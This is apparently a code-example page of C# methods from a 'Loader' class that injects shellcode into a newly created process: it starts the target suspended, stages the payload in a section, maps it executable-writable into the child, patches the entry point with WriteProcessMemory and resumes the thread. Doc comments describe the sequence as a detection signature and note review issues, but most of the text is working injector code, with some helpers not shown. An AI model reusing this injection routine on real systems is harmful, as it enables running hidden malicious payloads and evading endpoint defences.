Пример #1
        /// <summary>
        /// Launches <paramref name="path"/> through <c>Loader.CreateProcess</c> and hands back the
        /// process and thread handles that the call fills in.
        /// </summary>
        /// <remarks>
        /// The creation flag value 4 is Win32 <c>CREATE_SUSPENDED</c>: the primary thread of the new
        /// process does not run until something resumes it. A child that is created suspended, has its
        /// memory modified by the parent and is only then resumed is a sequence that endpoint
        /// monitoring commonly treats as an indicator of process injection.
        /// The application-name argument is null and <paramref name="path"/> travels as the command
        /// line, so CreateProcess itself decides where the executable name ends; an unquoted path
        /// containing spaces is parsed ambiguously in that mode.
        /// The caller owns the returned handles and is responsible for closing them.
        /// </remarks>
        /// <param name="path">Command line of the process to start.</param>
        /// <returns>The <c>PROCESS_INFORMATION</c> structure produced by CreateProcess.</returns>
        /// <exception cref="SystemException">CreateProcess reported failure.</exception>
        public Loader.PROCESS_INFORMATION StartProcess(string path)
        {
            // Win32 CREATE_SUSPENDED (0x00000004).
            const uint CreateSuspended = 4u;

            Loader.STARTUPINFO startupInfo = default(Loader.STARTUPINFO);
            Loader.PROCESS_INFORMATION processInfo;

            bool created = Loader.CreateProcess(
                IntPtr.Zero,        // lpApplicationName: none, the command line names the image
                path,               // lpCommandLine
                IntPtr.Zero,        // lpProcAttribs
                IntPtr.Zero,        // lpThreadAttribs
                false,              // bInheritHandles
                CreateSuspended,    // dwCreateFlags
                IntPtr.Zero,        // lpEnvironment
                IntPtr.Zero,        // lpCurrentDir
                ref startupInfo,
                out processInfo);

            if (created)
            {
                return processInfo;
            }

            throw new SystemException("[x] Failed to create process!");
        }
Пример #2
 /// <summary>
 /// Starts <paramref name="targetProcess"/>, stages <paramref name="shellcode"/> in a section
 /// sized to the payload, and hands the new process to <c>MapAndStart</c>.
 /// </summary>
 /// <remarks>
 /// Read together with <c>StartProcess</c> and <c>MapAndStart</c> on this page, the visible
 /// sequence is: create a child process suspended, write into the child's memory from the
 /// parent, then resume the child's thread. That ordering is the behavioural signature that
 /// process-injection detections key on (suspended creation followed by cross-process memory
 /// modification and a thread resume by the same parent).
 /// The bodies of FindEntry, CreateSection, SetLocalSection and CopyShellcode are not shown
 /// here; what they do is inferred from their names only.
 /// </remarks>
 /// <param name="targetProcess">Command line passed to <c>StartProcess</c>.</param>
 /// <param name="shellcode">Payload bytes; only its length and contents are used here.</param>
 /// <exception cref="SystemException">
 /// CreateSection returned false, or StartProcess / MapAndStart threw.
 /// </exception>
 public void Load(string targetProcess, byte[] shellcode)
 {
     // The child is created before shellcode is touched, so a null shellcode argument
     // fails only after a new process already exists.
     Loader.PROCESS_INFORMATION pROCESS_INFORMATION = this.StartProcess(targetProcess);
     // Presumably records the child's entry location in this.pEntry_, which MapAndStart
     // later writes to — confirm against FindEntry.
     this.FindEntry(pROCESS_INFORMATION.hProcess);
     if (!this.CreateSection((uint)shellcode.Length))
     {
         throw new SystemException("[x] Failed to create new section!");
     }
     this.SetLocalSection((uint)shellcode.Length);
     this.CopyShellcode(shellcode);
     this.MapAndStart(pROCESS_INFORMATION);
     // NOTE(review): the handles are closed only on the success path; any exception thrown
     // above skips both CloseHandle calls and leaves the child as StartProcess created it.
     Loader.CloseHandle(pROCESS_INFORMATION.hThread);
     Loader.CloseHandle(pROCESS_INFORMATION.hProcess);
 }
Пример #3
        /// <summary>
        /// Maps the section into the process described by <paramref name="pInfo"/>, writes a patch
        /// at <c>this.pEntry_</c> in that process, and resumes the process's thread.
        /// </summary>
        /// <remarks>
        /// From a detection standpoint this method holds the two observable cross-process
        /// operations of the technique: a <c>WriteProcessMemory</c> into another process at its
        /// start location, followed by <c>ResumeThread</c> on that process's thread. The section
        /// mapping is done by <c>MapSection</c>, whose body is not shown on this page.
        /// </remarks>
        /// <param name="pInfo">Process and thread handles of the target, as returned by StartProcess.</param>
        /// <exception cref="SystemException">
        /// The mapping, the patch write, the read-back, or the thread resume reported failure.
        /// </exception>
        public void MapAndStart(Loader.PROCESS_INFORMATION pInfo)
        {
            // 64u is presumably a page-protection value (0x40 is PAGE_EXECUTE_READWRITE in Win32);
            // confirm against MapSection. A writable-and-executable mapping in a remote process
            // is itself something memory scanners look for.
            KeyValuePair <IntPtr, IntPtr> keyValuePair = this.MapSection(pInfo.hProcess, 64u, IntPtr.Zero);

            // Either half of the pair being zero is treated as a failed mapping.
            if (keyValuePair.Key == (IntPtr)0 || keyValuePair.Value == (IntPtr)0)
            {
                throw new SystemException("[x] Failed to map section into target process!");
            }
            // Judging by the field names, Key is the remote base address and Value the mapped size.
            this.remotemap_  = keyValuePair.Key;
            this.remotesize_ = keyValuePair.Value;
            // Returns (byte count, pointer to the patch bytes); the pointer is released with
            // FreeHGlobal below, so it is presumably an AllocHGlobal allocation — confirm.
            KeyValuePair <int, IntPtr> keyValuePair2 = this.BuildEntryPatch(keyValuePair.Key);

            try
            {
                IntPtr nSize = (IntPtr)keyValuePair2.Key;
                // NOTE(review): assigning the literal 0 to an IntPtr relies on an implicit integer
                // conversion that older C# compilers reject; confirm the target language version.
                IntPtr value = 0;
                // Cross-process write of the patch to this.pEntry_; `value` receives the number of
                // bytes written and a zero count is treated as failure as well.
                // NOTE(review): Loader.GetLastError() is read after other managed work has run; if
                // it is a plain P/Invoke of GetLastError the code may be stale — confirm.
                if (!Loader.WriteProcessMemory(pInfo.hProcess, this.pEntry_, keyValuePair2.Value, nSize, out value) || value == IntPtr.Zero)
                {
                    throw new SystemException("[x] Failed to write patch to start location! " + Loader.GetLastError().ToString());
                }
            }
            finally
            {
                // The local patch buffer is released whether or not the write succeeded.
                if (keyValuePair2.Value != IntPtr.Zero)
                {
                    Marshal.FreeHGlobal(keyValuePair2.Value);
                }
            }
            // Reads 1024 bytes back from this.pEntry_ into a 4096-byte buffer. Neither the buffer
            // nor the byte count is used afterwards; only the call's success is checked.
            byte[] lpBuffer = new byte[4096];
            IntPtr intPtr   = 0;

            if (!Loader.ReadProcessMemory(pInfo.hProcess, this.pEntry_, lpBuffer, 1024, out intPtr))
            {
                throw new SystemException("Failed!");
            }
            // ResumeThread returns (DWORD)-1, i.e. 4294967295, on failure.
            if (Loader.ResumeThread(pInfo.hThread) == 4294967295u)
            {
                throw new SystemException("[x] Failed to restart thread!");
            }
        }
Пример #4
 // Managed declaration of the Win32 CreateProcess entry point. The [DllImport] attribute that
 // an extern method requires is not part of this excerpt, so the character set and
 // SetLastError behaviour cannot be read from here.
 // lpApplicationName is typed as IntPtr rather than string; the caller shown on this page
 // passes a null pointer and names the executable through lpCommandLine instead.
 private static extern bool CreateProcess(
     IntPtr lpApplicationName,
     string lpCommandLine,
     IntPtr lpProcAttribs,
     IntPtr lpThreadAttribs,
     bool bInheritHandles,
     uint dwCreateFlags,
     IntPtr lpEnvironment,
     IntPtr lpCurrentDir,
     [In] ref Loader.STARTUPINFO lpStartinfo,
     out Loader.PROCESS_INFORMATION lpProcInformation);